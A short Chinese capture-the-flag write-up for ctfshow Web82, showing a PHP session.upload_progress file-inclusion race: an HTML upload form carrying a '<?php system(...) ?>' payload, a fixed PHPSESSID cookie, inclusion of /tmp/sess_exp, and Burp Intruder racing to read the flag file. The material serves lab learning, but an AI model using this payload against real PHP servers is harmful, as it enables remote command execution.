文件包涵条件竞争(ctfshow82)

Web82

利用 session.upload_progress 包含文件漏洞

<!DOCTYPE html>

<html>

<body>

<form action="https://09558c1b-9569-4abd-bf78-86c4a6cb6608.challenge.ctf.show//" method="POST" enctype="multipart/form-data">

<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />

<input type="file" name="file" />

<input type="submit" value="submit" />

</form>

</body>

</html>

<?php

session_start();

?>

修改url地址,修改命令

上传文件bp抓包

添加cookie,清除参数

Cookie: PHPSESSID=exp

?file=/tmp/sess_exp

抓包发送到攻击模块

开始攻击

<?php system('cat fl0g.php'); ?>

相关推荐
heze098 小时前
sqli-labs-Less-19自动化注入方法
mysql·网络安全·自动化
网安CILLE9 小时前
Wireshark 抓包实战演示
linux·网络·python·测试工具·web安全·网络安全·wireshark
久违 °12 小时前
【安全开发】Nmap主机探测技术详解(一)
网络·安全·网络安全
缘木之鱼12 小时前
CTFshow __Web应用安全与防护 第一章
前端·安全·渗透·ctf·ctfshow
Whoami!13 小时前
❿⁄₁₄ ⟦ OSCP ⬖ 研记 ⟧ 密码攻击实践 ➱ 传递Net-NTLMv2哈希
网络安全·信息安全·密码破解·ntlm哈希
周某人姓周13 小时前
sqli-labs注入靶场搭建与sql语句
sql·安全·网络安全
吉吉6113 小时前
文件包含之伪协议漏洞复现
web安全·网络安全
Bruce_Liuxiaowei13 小时前
解决 PowerShell 模块加载无响应问题的实用指南——Invoke-Obfuscation为例
windows·网络安全·内网渗透
tangyal1 天前
渗透笔记1
笔记·网络安全·渗透
吗喽1543451881 天前
渗透高级第一次作业(笔记整理)
笔记·安全·网络安全